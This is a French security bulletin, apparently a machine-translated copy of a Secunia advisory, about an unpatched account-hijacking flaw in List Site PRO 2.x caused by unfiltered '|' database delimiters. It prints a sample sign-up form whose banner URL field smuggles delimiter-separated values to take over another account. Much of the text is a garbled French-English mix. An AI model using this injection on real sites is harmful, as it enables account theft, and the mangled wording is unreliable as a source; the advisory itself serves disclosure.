Sécurité informatique

SECURINFOS.INFO - Bulletins de sécurité informatique, Alertes et Protection

List Site PRO account hi-jacking

21/01/2007 01H26
Référence Secunia : SA7952 
Date de publication : 2003-01-27

Risque : Non Critique. Niveau 2 sur 5.
Impact : Contournement de la Sécurité
Lieu : A distance


Solutions :
Non corrigée


Produit :
List Site PRO 2.x

Description :
List Site PRO ne vérifie pas l'entrée utilisateur proprement. Cela permet aux utilisateurs de utiliser database delimeters '|', en utilisant database delimeters il est possible de hi-jack d'autres top site les accounts.

Make a new account en utilisant the plus loin example:
username:username
email:email@domain
url:www.domain
bannerurl:www.domain/banner.gif ||mot de passe|1036360992|60|468
banner height:68
banner width:460
mot de passe:pass

Ceci way vous devriez take over account 1036360992


Solutions :
Ceci leaves a good trail dans les fichiers de log, comme nom d'utilisateur est une partie de requêtes send au serveur web. Si quelqu'un abuses cela vous devriez terminate leurs les accounts.


Vulnérabilité découverte par :

StatiX




Les noms, marques et enseignes cités sur ce site sont la propriété de leurs déposants respectifs.